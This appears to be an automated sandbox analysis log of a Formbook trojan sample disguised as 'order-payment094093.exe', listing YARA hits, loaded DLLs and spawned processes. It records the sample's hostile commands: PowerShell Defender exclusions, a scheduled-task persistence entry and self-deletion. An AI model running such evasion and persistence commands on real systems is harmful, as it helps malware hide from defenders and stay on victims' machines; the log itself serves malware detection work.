Source: Process Memory Space: order-payment094093.exe PID: 5016, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: explorer.exe PID: 1612, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 3136, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: order-payment094093.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NFOLsr.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.order-payment094093.exe.7c40000.7.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order-payment094093.exe.7c40000.7.raw.unpack, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.order-payment094093.exe.7c40000.7.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order-payment094093.exe.46b9990.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order-payment094093.exe.46b9990.4.raw.unpack, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.order-payment094093.exe.46b9990.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.order-payment094093.exe.9770000.9.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.order-payment094093.exe.9770000.9.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, OPYYQ5pJkcvPJXM8Oe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, OPYYQ5pJkcvPJXM8Oe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: _0020.AddAccessRule
Source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, OPYYQ5pJkcvPJXM8Oe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order-payment094093.exe.9fc0000.10.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: _0020.AddAccessRule
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, KxBlY6Wka4Q7j64Dbl.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@538/15@4/4

Source: C:\Users\user\Desktop\order-payment094093.exe

File created: C:\Users\user\AppData\Roaming\NFOLsr.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03

Source: C:\Users\user\Desktop\order-payment094093.exe

File created: C:\Users\user\AppData\Local\Temp\tmpC97D.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: order-payment094093.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: order-payment094093.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\order-payment094093.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\order-payment094093.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: order-payment094093.exe	Virustotal: Detection: 55%
Source: order-payment094093.exe	ReversingLabs: Detection: 34%

Source: explorer.exe	String found in binary or memory: /LOADSAVEDWINDOWS
Source: explorer.exe	String found in binary or memory: accent-startColorMenu
Source: explorer.exe	String found in binary or memory: accent-startColor
Source: explorer.exe	String found in binary or memory: themes-installTheme
Source: explorer.exe	String found in binary or memory: Microsoft-Windows-Shell-Launcher
Source: explorer.exe	String found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll

Source: C:\Users\user\Desktop\order-payment094093.exe

File read: C:\Users\user\Desktop\order-payment094093.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\order-payment094093.exe "C:\Users\user\Desktop\order-payment094093.exe"
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NFOLsr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Users\user\Desktop\order-payment094093.exe "C:\Users\user\Desktop\order-payment094093.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\NFOLsr.exe C:\Users\user\AppData\Roaming\NFOLsr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\order-payment094093.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process created: C:\Users\user\AppData\Roaming\NFOLsr.exe "C:\Users\user\AppData\Roaming\NFOLsr.exe"
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe"	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NFOLsr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Process created: C:\Users\user\Desktop\order-payment094093.exe "C:\Users\user\Desktop\order-payment094093.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process created: C:\Users\user\AppData\Roaming\NFOLsr.exe "C:\Users\user\AppData\Roaming\NFOLsr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\order-payment094093.exe"
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
